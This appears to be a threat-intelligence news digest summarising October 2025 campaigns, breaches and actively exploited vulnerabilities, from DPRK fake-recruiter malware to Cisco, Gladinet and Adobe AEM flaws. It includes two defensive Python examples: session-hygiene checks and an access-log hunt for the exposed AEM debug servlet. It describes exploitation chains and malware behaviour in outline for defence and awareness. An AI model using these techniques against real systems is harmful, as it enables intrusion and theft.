The North Korea-linked actors behind the Contagious Interview campaign have been attributed a previously undocumented backdoor called AkdoorTea, alongside tools such as TsunamiKit and Tropidoor. The campaign targets software developers on Windows, Linux, and macOS, particularly those working on cryptocurrency and Web3 projects, using impersonated recruiters who offer lucrative roles on LinkedIn, Upwork, Freelancer, and Crypto Jobs List. The attacks deliver malware including BeaverTail, InvisibleFerret, OtterCookie, GolangGhost, and PylangGhost. WeaselStore's functionality resembles BeaverTail and InvisibleFerret, focusing on exfiltrating sensitive data from browsers and cryptocurrency wallets. TsunamiKit, first discovered in November 2024, is a toolkit for information and cryptocurrency theft comprising TsunamiLoader, TsunamiInjector, TsunamiInstallor, TsunamiHardener, and TsunamiClient; TsunamiClient incorporates .NET spyware and drops cryptocurrency miners such as XMRig and NBMiner. Tropidoor is a sophisticated payload linked to the DeceptiveDevelopment group, sharing code with PostNapTea and LightlessCan. AkdoorTea is a remote access trojan delivered by a Windows batch script and shares commonalities with Akdoor and NukeSped (Manuscrypt).

The DeceptiveDevelopment campaign targets developers associated with cryptocurrency and decentralized finance projects with fake job offers aimed at information theft and malware infection. Stolen developer information is supplied to North Korea's fraudulent IT workers, tracked as WageMole, who use it to pose as job seekers and obtain remote work at unsuspecting companies. These IT workers operate in teams focused on obtaining work in Western countries, particularly the US, and in Europe, targeting France, Poland, Ukraine, and Albania. They impersonate real companies and engineers, produce engineering drawings with falsified approval stamps, and focus on self-education in web programming, blockchain, English, and AI integration.

Contagious Interview has also expanded into malicious packages in the npm, PyPI, and RubyGems ecosystems, using Discord webhooks as a C2 channel to exfiltrate data. Identified packages include mysql-dumpdiscord and nodejs.discord (npm), malinssx, malicus, and maliinn (PyPI), and sqlcommenter_rails (RubyGems.org). The campaign has published 338 malicious packages, downloaded over 50,000 times, using more than 180 fake personas and over a dozen C2 endpoints. It targets Web3, cryptocurrency, and blockchain developers as well as job seekers in the technical sector, relies on typosquatting and lookalike library names, and delivers HexEval, XORIndex, encrypted loaders, BeaverTail, and InvisibleFerret.

North Korean hackers have additionally adopted EtherHiding, a technique first described by Guardio Labs in 2023 that uses smart contracts to host and deliver malware in social engineering campaigns that steal cryptocurrency. Because the payload lives on a public blockchain, EtherHiding is resilient to conventional takedown and blocklisting efforts, and the pseudonymous nature of blockchain transactions makes the operator difficult to trace; it amounts to a form of next-generation bulletproof hosting. A DPRK actor tracked as UNC5342 has employed EtherHiding in Contagious Interview operations since February 2025. The smart contract hosts the JADESNOW downloader, which queries Ethereum to fetch the third-stage payload, a JavaScript version of InvisibleFerret. That payload runs in memory and may request an additional credential-stealing component from Ethereum, which targets passwords, credit cards, and cryptocurrency wallet (MetaMask and Phantom) data stored in browsers such as Chrome and Edge. The malware runs in the background and listens for C2 commands, such as executing arbitrary commands and exfiltrating files in ZIP form to an external server or Telegram. The infection chain thus proceeds in stages through JADESNOW, BEAVERTAIL, and INVISIBLEFERRET. Fake recruiters lure candidates onto Telegram or Discord, mimicking legitimate recruitment processes with fabricated companies, and deliver the malware through deceptive coding tests or fake software downloads disguised as technical assessments or interview fixes, aiming to steal sensitive data and cryptocurrency and to gain persistent access to corporate networks. The campaign affects Windows, macOS, and Linux systems.

F5 BIG-IP Source Code and Vulnerability Information Stolen in Cyberattack

Updated: 17.10.2025 15:16 · First: 15.10.2025 16:32 · 📰 7 src / 10 articles

Over 266,000 F5 BIG-IP instances are exposed online, potentially vulnerable to remote attacks following a breach disclosed by F5. The company has released security updates to address 44 vulnerabilities, including those stolen in the breach. F5 has not found evidence that the stolen information has been used in actual attacks or disclosed publicly. The breach was attributed to a highly sophisticated nation-state threat actor, and F5 has taken extensive actions to contain the threat. F5's BIG-IP is a critical product used in application delivery networking and traffic management by many large enterprises. The company has 23,000 customers in 170 countries, including 48 of the Fortune 50 entities. The breach did not compromise F5's software supply chain or result in suspicious code modifications. The company has validated the safety of BIG-IP releases through multiple independent reviews by leading cybersecurity firms and has advised users to apply the latest updates for BIG-IP and related products. The breach involved a nation-state threat actor gaining persistent, long-term access to F5's product development environment and engineering knowledge management platforms. F5 disclosed the breach on October 15, 2025, confirming that the attack was detected in August 2025. The threat actor exfiltrated files containing BIG-IP source code and information regarding undisclosed vulnerabilities. F5 has not found evidence of access to or exfiltration of data tied to its CRM, financial, support case management, or iHealth systems, nor the NGINX source code or product development environment. F5 has identified no evidence of modification to its software supply chain, including source code, build pipeline, and release pipeline. F5 has worked with multiple incident response firms and law enforcement to mitigate the event and believes it has contained the threat. 
F5 has rotated credentials, strengthened access controls, deployed improved inventory and patch management automation, integrated better monitoring and detection tools, and implemented enhancements to network security infrastructure. F5 advises customers to apply the latest BIG-IP updates and has shared guidance for hardening customers' systems. On October 15, 2025, CISA directed federal civilian executive branch (FCEB) agencies to inventory F5 BIG-IP products and apply updates where necessary. The US government has urged federal agencies to take immediate action after F5 revealed it had been breached by a nation-state actor. The US Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive demanding that federal agencies evaluate whether the networked management interfaces are accessible from the public internet and apply updates from F5. CISA warned that the threat actor's access to the F5 development environment could enable it to conduct static and dynamic analysis to discover logical flaws, zero-day vulnerabilities, and targeted exploits. The Justice Department ordered a delay in public disclosure of the breach on September 12, 2025. F5 has improved internal security, including access controls, inventory and patch management, network security, and monitoring of all software development platforms. Tom Kellermann, VP of cyber risk at HITRUST, argued that the F5 breach is likely to be the first stage in a supply chain campaign. Ilia Kolochenko, CEO of ImmuniWeb, agreed that the stolen IP could be used to craft zero-day exploits for subsequent APT campaigns.

Zendesk Platform Abused for Email Flood Attacks

Updated: · First: 17.10.2025 14:26 · 📰 1 src / 1 articles

Cybercriminals have exploited lax authentication settings in Zendesk to flood targeted email inboxes with spam messages. The attacks use hundreds of Zendesk corporate customers simultaneously, sending notifications from customer domain names. Zendesk acknowledged the issue and is investigating additional preventive measures. The abuse involves sending ticket creation notifications from customer accounts that allow anonymous submissions. This allows attackers to create support tickets with any chosen subject line, including menacing or insulting messages. The notifications appear to come from legitimate customer domains, making them harder to filter out. Zendesk recommends customers configure authenticated ticket creation workflows to prevent such abuse, but some customers prefer anonymous environments for various business reasons.

Identity Security Emerges as Critical Enterprise Defense

Updated: · First: 17.10.2025 14:00 · 📰 1 src / 1 articles

Identity security has become the primary defense mechanism for enterprises. The increasing use of AI agents and automated systems has expanded attack surfaces, making identity management crucial. Organizations with mature identity security programs achieve higher ROI and better risk reduction. However, many organizations lag in identity security maturity, leaving them vulnerable to modern threats. The 2025-2026 SailPoint Horizons of Identity Security report highlights the strategic importance of identity security. It shows that mature identity programs prevent breaches, drive operational efficiency, and enable new business capabilities. Organizations must proactively assess their identity security posture to manage risks effectively.

Prosper Data Breach Exposes 17.6 Million Accounts

Updated: 17.10.2025 13:45 · First: 16.10.2025 22:19 · 📰 2 src / 2 articles

Prosper, a peer-to-peer lending marketplace, experienced a data breach on September 2, 2025, exposing personal information of 17.6 million accounts. The stolen data includes Social Security numbers, names, government-issued IDs, employment status, credit status, income levels, dates of birth, physical addresses, IP addresses, and browser user agent details. The breach was attributed to a threat actor named Hiron. The company has not found evidence of unauthorized access to customer accounts or funds. Prosper disclosed the breach on September 2, 2025, and has since collaborated with law enforcement and deployed enhanced security controls. The company is offering free credit monitoring to affected individuals once the full scope of the breach is determined.

Critical Out-of-Bounds Write Vulnerability in WatchGuard Firebox Firewalls

Updated: 17.10.2025 12:25 · First: 18.09.2025 11:23 · 📰 2 src / 2 articles

WatchGuard has released security updates to address a critical remote code execution vulnerability (CVE-2025-9242, CVSS score 9.3) in Firebox firewalls. This flaw, caused by an out-of-bounds write weakness, affects devices running Fireware OS 11.x, 12.x, and 2025.1. Successful exploitation can allow attackers to execute malicious code remotely on vulnerable devices. The vulnerability impacts devices configured to use IKEv2 VPN, and devices may remain at risk even if the vulnerable configurations have been deleted. WatchGuard has provided patches and a temporary workaround for administrators who cannot immediately update their devices. The vulnerability is not yet being exploited in the wild, but administrators are advised to patch their devices promptly. The flaw is present in the function 'ike2_ProcessPayload_CERT' in the file 'src/ike/iked/v2/ike2_payload_cert.c'.

Infostealers Driving Ransomware Attacks and Mitigation Strategies

Updated: · First: 17.10.2025 11:30 · 📰 1 src / 1 articles

Infostealers are a significant driver of the current ransomware wave, with stealer logs available for as little as $10 on the dark web. Security experts recommend deploying specific technical defenses to mitigate the threat. Infostealers have evolved over the years, integrating various capabilities to extract sensitive information. The evolution of infostealers, from early keyloggers like Zeus and SpyEye to modern variants like LummaC2 and Redline, highlights the need for robust security measures. Experts advise implementing technical controls such as regular password changes, FIDO2-enabled multifactor authentication, forced authentication, session token expiration, cookie replay detection, and monitoring for suspicious travel patterns. These measures are crucial for protecting against infostealer infections and the subsequent ransomware attacks.
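Three of the controls listed above (session token expiration, cookie replay detection, and suspicious-travel monitoring) are simple enough to show end to end. The following is an added illustration written for this page, not code from the article or from any vendor it cites; the timeouts, the speed threshold, the client-fingerprint scheme, and the login records are all assumptions constructed for the example. The point it makes that the summary does not: a stealer log hands the attacker a valid cookie, so the cookie alone must not be sufficient, and the checks that defeat it are cheap bookkeeping on the server side.

```python
"""Session-hygiene controls against stolen-cookie reuse (added example, not from the article).

Three controls over constructed sample data:
  * session token expiration (absolute lifetime and idle timeout),
  * cookie replay detection (a session is bound to the client fingerprint captured at
    login; the same cookie arriving with a different fingerprint is treated as replayed),
  * suspicious-travel detection (two logins by one user implying an impossible speed).
Thresholds and the fingerprint scheme are assumptions for the example.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from math import asin, cos, radians, sin, sqrt
from typing import Optional

ABSOLUTE_TTL = timedelta(hours=8)   # assumed policy: re-authenticate at least daily
IDLE_TTL = timedelta(minutes=30)    # assumed policy: idle sessions die quickly
MAX_SPEED_KMH = 900.0               # roughly airliner speed; anything faster is implausible


@dataclass
class Session:
    token: str
    user: str
    issued_at: datetime
    last_seen: datetime
    fingerprint: str  # e.g. hash of User-Agent + TLS fingerprint recorded at login


@dataclass
class Request:
    token: str
    at: datetime
    fingerprint: str


def check_session(session: Session, req: Request) -> Optional[str]:
    """Return None if the request may proceed, otherwise the rejection reason.

    Expiry is checked before replay: a replayed cookie on a dead session is
    reported as expired, because the session is gone either way.
    """
    if req.token != session.token:
        return "unknown_token"
    if req.at - session.issued_at > ABSOLUTE_TTL:
        return "expired_absolute"
    if req.at - session.last_seen > IDLE_TTL:
        return "expired_idle"
    if req.fingerprint != session.fingerprint:
        return "cookie_replay"
    session.last_seen = req.at  # slide the idle window only on an accepted request
    return None


def haversine_km(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance in kilometres (Earth radius 6371 km)."""
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


@dataclass
class Login:
    user: str
    at: datetime
    lat: float
    lon: float
    city: str


def impossible_travel(logins, max_speed_kmh: float = MAX_SPEED_KMH):
    """Flag consecutive logins of one user whose implied speed exceeds the threshold.

    Returns (user, from_city, to_city, implied_speed_kmh) tuples.
    """
    by_user = defaultdict(list)
    for login in logins:
        by_user[login.user].append(login)
    findings = []
    for user, entries in by_user.items():
        entries.sort(key=lambda e: e.at)
        for a, b in zip(entries, entries[1:]):
            km = haversine_km(a.lat, a.lon, b.lat, b.lon)
            hours = max((b.at - a.at).total_seconds(), 1.0) / 3600.0  # never divide by zero
            speed = km / hours
            if speed > max_speed_kmh:
                findings.append((user, a.city, b.city, round(speed)))
    return findings


def demo():
    """Run the checks over constructed sample data and return the results."""
    t0 = datetime(2025, 10, 17, 9, 0)
    session = Session("tok-1", "alice", issued_at=t0, last_seen=t0, fingerprint="fp-A")
    results = {
        "ok": check_session(session, Request("tok-1", t0 + timedelta(minutes=10), "fp-A")),
        "replay": check_session(session, Request("tok-1", t0 + timedelta(minutes=12), "fp-B")),
        "idle": check_session(session, Request("tok-1", t0 + timedelta(minutes=45), "fp-A")),
        "absolute": check_session(session, Request("tok-1", t0 + timedelta(hours=9), "fp-A")),
    }
    logins = [  # constructed: alice cannot be in Berlin and Sao Paulo one hour apart
        Login("alice", t0, 52.52, 13.405, "Berlin"),
        Login("alice", t0 + timedelta(hours=1), -23.55, -46.63, "Sao Paulo"),
        Login("bob", t0, 52.52, 13.405, "Berlin"),
        Login("bob", t0 + timedelta(hours=3), 48.137, 11.575, "Munich"),
    ]
    results["travel"] = impossible_travel(logins)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The fingerprint check is deliberately coarse: a stealer that copies the browser profile can also copy the User-Agent, so in production the binding should include something the stealer cannot export, such as a device-bound key from a FIDO2 credential, which is why the summary pairs these controls with FIDO2 MFA.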

Oyster Malware Distributed via Fake Microsoft Teams Installers

Updated: 17.10.2025 09:03 · First: 27.09.2025 22:49 · 📰 3 src / 4 articles

A new malvertising campaign uses SEO poisoning to distribute fake Microsoft Teams installers that deploy the Oyster backdoor on Windows devices. The malware provides attackers with remote access to corporate networks, enabling command execution, payload deployment, and file transfers. The campaign targets users searching for 'Teams download,' leading them to a fake site that mimics Microsoft's official download page. The malicious installer, signed with legitimate certificates, drops a DLL into the %APPDATA%\Roaming folder and creates a scheduled task for persistence. Microsoft revoked over 200 certificates used to sign malicious Teams installers in a wave of Rhysida ransomware attacks in early October. The threat group Vanilla Tempest, also tracked as VICE SPIDER and Vice Society, is a financially motivated actor that focuses on deploying ransomware and exfiltrating data for extortion. The Oyster malware, also known as Broomstick and CleanUpLoader, has been linked to multiple campaigns and ransomware operations, such as Rhysida. The campaign was first disclosed by Blackpoint Cyber in September 2025, highlighting how users searching for Teams online were redirected to bogus download pages, where they were offered a malicious MSTeamsSetup.exe instead of the legitimate client. The threat actor used Trusted Signing, SSL.com, DigiCert, and GlobalSign code signing services to sign the malicious installers and other post-compromise tools.

Sotheby's data breach exposes employee financial information

Updated: 16.10.2025 22:24 · First: 16.10.2025 22:24 · 📰 2 src / 2 articles

Sotheby's, a leading global auction house, detected a data breach on July 24, 2025, in which threat actors stole sensitive employee information, including financial details. The breach was discovered in July 2025, but the investigation took two months to determine the extent of the data stolen and the individuals impacted. The exposed information includes full names, Social Security numbers (SSNs), and financial account information. The total number of impacted individuals remains undisclosed, but at least four individuals in Maine and Rhode Island were affected. Sotheby's has offered a 12-month free identity protection and credit monitoring service through TransUnion to affected employees.

End of Support for Microsoft Office 2016 and Office 2019

Updated: 16.10.2025 18:50 · First: 17.09.2025 17:57 · 📰 2 src / 2 articles

Microsoft Office 2016 and Office 2019 reached the end of extended support on October 14, 2025. This means no further updates, security fixes, or technical support will be available for these versions. Users are advised to upgrade to Microsoft 365 Apps or standalone versions like Office 2024 and Office LTSC 2024 to avoid security, compliance, and performance issues. Visio 2016/2019, Project 2016/2019, Skype for Business 2016 and 2019, and related apps have also reached the end of support. Microsoft has issued multiple reminders to migrate to supported versions.

Active Exploitation of Unpatched Gladinet and TrioFox Vulnerability

Updated: 16.10.2025 18:11 · First: 10.10.2025 12:34 · 📰 3 src / 4 articles

Active exploitation of an unpatched security flaw in Gladinet CentreStack and TrioFox products continues. The zero-day vulnerability, CVE-2025-11371, is an unauthenticated local file inclusion bug that allows unintended disclosure of system files. This flaw affects all versions prior to and including 16.7.10368.56560. The vulnerability has been exploited to retrieve the machine key from the application Web.config file, enabling remote code execution via a ViewState deserialization vulnerability. Three customers have been impacted so far. A patch for the zero-day vulnerability CVE-2025-11371 is now available in CentreStack version 16.10.10408.56683. Users are advised to upgrade to this version or, if upgrading is not possible, disable the "temp" handler within the Web.config file for UploadDownloadProxy to mitigate the risk. The vendor, Gladinet, has been notified and is working on a fix. The vulnerability was detected by researchers at Huntress on September 27, 2025. The flaw was exploited to obtain a machine key and execute code remotely. The attack used an older deserialization vulnerability (CVE-2025-30406) to achieve remote code execution (RCE) through ViewState. The mitigations will impact some functionality of the platform but prevent exploitation of CVE-2025-11371.

Cisco IOS and IOS XE SNMP Zero-Day Exploited in Attacks

Updated: 16.10.2025 18:00 · First: 24.09.2025 19:52 · 📰 5 src / 5 articles

Cisco has released security updates to address a high-severity zero-day vulnerability (CVE-2025-20352) in Cisco IOS and IOS XE Software. The flaw is a stack-based buffer overflow in the Simple Network Management Protocol (SNMP) subsystem, actively exploited in attacks. This vulnerability allows authenticated, remote attackers to cause denial-of-service (DoS) conditions or gain root control of affected systems. The vulnerability impacts all devices with SNMP enabled, including specific Cisco devices running Meraki CS 17 and earlier. Cisco advises customers to upgrade to a fixed software release, specifically Cisco IOS XE Software Release 17.15.4a, to remediate the vulnerability. Temporary mitigation involves limiting SNMP access to trusted users and disabling the affected Object Identifiers (OIDs) on devices. Additionally, Cisco patched 13 other security vulnerabilities, including two with available proof-of-concept exploit code. Cisco also released patches for 14 vulnerabilities in IOS and IOS XE, including eight high-severity vulnerabilities. Proof-of-concept exploit code exists for two of the vulnerabilities, but exploitation is not confirmed. Three additional medium-severity bugs affect Cisco’s SD-WAN vEdge, Access Point, and Wireless Access Point (AP) software. Cybersecurity researchers have disclosed details of a new campaign, codenamed "Operation Zero Disco", that exploited CVE-2025-20352 to deploy Linux rootkits on older, unprotected systems. The attacks targeted Cisco 9400, 9300, and legacy 3750G series devices, and involved the exploitation of a modified Telnet vulnerability (based on CVE-2017-3881) to enable memory access. The rootkits allowed attackers to achieve remote code execution and gain persistent unauthorized access by setting universal passwords and installing hooks into the Cisco IOS daemon (IOSd) memory space. 
The attacks singled out victims running older Linux systems without endpoint detection and response (EDR) solutions, using spoofed IP and MAC addresses. The rootkit creates a universal password containing the word "disco" by modifying IOSd memory, and installs several hooks into the IOSd; these fileless components disappear after a reboot but can still enable lateral movement in the meantime. Newer switch models provide some protection via Address Space Layout Randomization (ASLR). The campaign used a UDP controller on infected switches, able to listen on any port for remote commands, to toggle logs, bypass authentication, and conceal configuration changes. The rootkit could hide running-config items such as account names, EEM scripts, and ACLs; bypass VTY ACLs; reset the last running-config write timestamp; and toggle or delete device logs. The attacks against 32-bit builds used an SNMP exploit that split command payloads across packets, while 64-bit targets required guest shell access at privilege level 15 to install the fileless backdoor and the UDP controller for remote management. Trend Research recovered multiple exploit variants for 32-bit and 64-bit platforms, and Cisco provided forensic support that helped confirm the affected models and assisted the investigation.

UNC5142 Abuses Blockchain Smart Contracts to Spread Malware via Compromised WordPress Sites

Updated: · First: 16.10.2025 17:52 · 📰 1 src / 1 articles

A financially motivated threat actor, UNC5142, has been exploiting blockchain smart contracts to distribute information stealers such as Atomic, Lumma, Rhadamanthys, and Vidar on Windows and macOS systems. The attacks leverage compromised WordPress websites and a technique called 'EtherHiding' to hide malicious code on public blockchains. The campaign uses a multi-stage JavaScript downloader named CLEARSHORT to deliver malware, with the first stage interacting with a malicious smart contract on the BNB Smart Chain. The smart contract retrieves a landing page from an external server, which then employs social engineering tactics to infect the system. Google Threat Intelligence Group (GTIG) flagged about 14,000 web pages containing injected JavaScript associated with UNC5142, indicating a broad targeting of vulnerable WordPress sites. However, no activity has been observed since July 23, 2025.

Active Exploitation of Critical Adobe AEM Forms Misconfiguration

Updated: 16.10.2025 17:28 · First: 16.10.2025 07:26 · 📰 2 src / 2 articles

A critical misconfiguration flaw in Adobe Experience Manager (AEM) Forms on JEE versions 6.5.23.0 and earlier is under active exploitation. The flaw, CVE-2025-54253, allows arbitrary code execution via an exposed servlet. Adobe released a patch in August 2025. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. Federal agencies must apply the necessary fixes by November 5, 2025. The flaw was discovered by Adam Kues and Shubham Shah of Searchlight Cyber, who disclosed it to Adobe on April 28, 2025. The flaw is caused by an exposed /adminui/debug servlet that evaluates user-supplied OGNL expressions as Java code without authentication or input validation. This enables attackers to execute arbitrary system commands with a single crafted HTTP request. A proof-of-concept exploit is publicly available.
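Because the summary names the exposed path, the first defender's question is whether anyone has reached it. The following is an added example written for this page, not code from Adobe, Searchlight Cyber, or the article: it parses web-server combined-format access logs, normalises the request path (URL-decoding and case-folding so trivial variants do not slip past a string match), and reports per source IP how many requests hit `/adminui/debug` and how many were answered with a 2xx status. The log lines are constructed for the example and use documentation IP ranges; only the `/adminui/debug` path comes from the advisory summary above.

```python
"""Hunting access logs for requests to the exposed AEM Forms debug servlet.

Added example, not code from the article or from Adobe/Searchlight Cyber. On a
patched or properly firewalled host every request to the watched path should be a
403/404; a 2xx on /adminui/debug is the line to escalate.
"""
import re
from collections import defaultdict
from urllib.parse import unquote

# Path from the advisory summary; extend with other admin endpoints you watch.
WATCHED_PATHS = ("/adminui/debug",)

# Apache/nginx "combined" format: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+'
)


def parse_line(line: str):
    """Return a dict with ip/ts/method/path/status/norm_path, or None if not combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # Drop the query string, decode percent-encoding, fold case:
    # "/ADMINUI/debug%2F?x=1" -> "/adminui/debug/"
    rec["norm_path"] = unquote(rec["path"].split("?", 1)[0]).lower()
    return rec


def hunt(lines, watched=WATCHED_PATHS):
    """Aggregate requests to watched paths per source IP.

    Returns {ip: {"requests": n, "successful": n, "first_seen": ts, "last_seen": ts}}.
    """
    hits = defaultdict(lambda: {"requests": 0, "successful": 0,
                                "first_seen": None, "last_seen": None})
    for line in lines:
        rec = parse_line(line)
        if rec is None or not any(rec["norm_path"].startswith(w) for w in watched):
            continue
        h = hits[rec["ip"]]
        h["requests"] += 1
        if 200 <= rec["status"] < 300:
            h["successful"] += 1
        h["first_seen"] = h["first_seen"] or rec["ts"]
        h["last_seen"] = rec["ts"]
    return dict(hits)


# Constructed sample; the IPs are documentation ranges, not real hosts.
SAMPLE_LOG = """\
192.0.2.10 - - [16/Oct/2025:07:01:13 +0000] "GET /content/dam/site/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [16/Oct/2025:07:02:40 +0000] "GET /adminui/debug HTTP/1.1" 403 199 "-" "python-requests/2.31"
198.51.100.77 - - [16/Oct/2025:07:03:02 +0000] "POST /adminui/debug HTTP/1.1" 200 842 "-" "curl/8.4.0"
198.51.100.77 - - [16/Oct/2025:07:03:09 +0000] "GET /ADMINUI/debug%2F?x=1 HTTP/1.1" 200 860 "-" "curl/8.4.0"
192.0.2.10 - - [16/Oct/2025:07:05:55 +0000] "GET /login HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
this line is not an access-log record and is skipped
""".splitlines()


def report(lines=SAMPLE_LOG):
    """Return (ip, summary) pairs, IPs with successful hits first."""
    hits = hunt(lines)
    return sorted(hits.items(),
                  key=lambda kv: (-kv[1]["successful"], -kv[1]["requests"], kv[0]))


if __name__ == "__main__":
    for ip, h in report():
        flag = "ESCALATE" if h["successful"] else "probe"
        print(f"{flag:9} {ip:15} requests={h['requests']} 2xx={h['successful']} "
              f"{h['first_seen']} .. {h['last_seen']}")
```

Run against the real logs by passing an open file to `report()`; a 2xx on the watched path from a host outside your management network is worth treating as a compromise until proven otherwise, since the summary notes that one request suffices for code execution.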

LinkPro Rootkit Exploits eBPF to Evade Detection on Linux Systems

Updated: · First: 16.10.2025 17:28 · 📰 1 src / 1 articles

A new Linux rootkit named LinkPro has been discovered, leveraging eBPF to hide its presence and activate via specific TCP packets. The rootkit was found during an investigation into a compromised AWS-hosted infrastructure. Attackers exploited a vulnerable Jenkins server to deploy the rootkit, which uses a combination of eBPF modules and a shared library to conceal its activities and communicate with a command-and-control (C2) server. The rootkit can operate in both passive and active modes, supporting multiple communication protocols. It achieves persistence through a systemd service and modifies system configurations to hide its presence. The attackers used a malicious Docker image and additional malware to facilitate the infection.

Adoption of Unified Exposure Management Platforms for Preemptive Cyber Defense

Updated: · First: 16.10.2025 17:00 · 📰 1 src / 1 articles

Organizations are shifting from reactive to preemptive cyber defense strategies, driven by the need to manage exposures in hybrid and distributed environments. Unified Exposure Management Platforms (UEMPs) are emerging as a solution to continuously identify, validate, and remediate vulnerabilities. UEMPs integrate asset discovery, vulnerability assessment, and remediation into a single process, providing actionable insights that align with business outcomes. This approach aims to prevent breaches rather than just respond to them, addressing the limitations of traditional Managed Detection and Response (MDR) services. The shift is driven by increased regulatory scrutiny, expanded attack surfaces due to cloud migration and AI automation, and the rapid weaponization of vulnerabilities by sophisticated adversaries.

Microsoft reports surge in AI-driven cyber threats and defenses

Updated: · First: 16.10.2025 17:00 · 📰 1 src / 1 articles

Microsoft's Digital Defense Report 2025 highlights a dramatic escalation in AI-driven cyber attacks. Microsoft systems analyze over 100 trillion security signals daily, indicating the growing sophistication and volume of cyber threats. Adversaries are leveraging generative AI to automate phishing, scale social engineering, and discover vulnerabilities faster than humans can patch them. Autonomous malware adapts tactics in real-time to bypass security systems, and AI tools themselves are becoming high-value targets. Microsoft's AI-powered defenses have reduced response times from hours to seconds, but defenders must remain vigilant as AI increases the speed and impact of cyber operations. Identity compromise remains a dominant attack vector, with phishing and social engineering accounting for 28% of breaches. Multi-factor authentication (MFA) prevents over 99% of unauthorized access attempts, but adoption rates are uneven. The rise of infostealers has fueled credential-based intrusions. The United States accounted for 24.8% of all observed attacks between January and June 2025, followed by the United Kingdom, Israel, and Germany. Government agencies, IT providers, and research institutions were among the most frequently targeted sectors. Ransomware remains a primary threat, with over 40% of recent cases involving hybrid cloud components.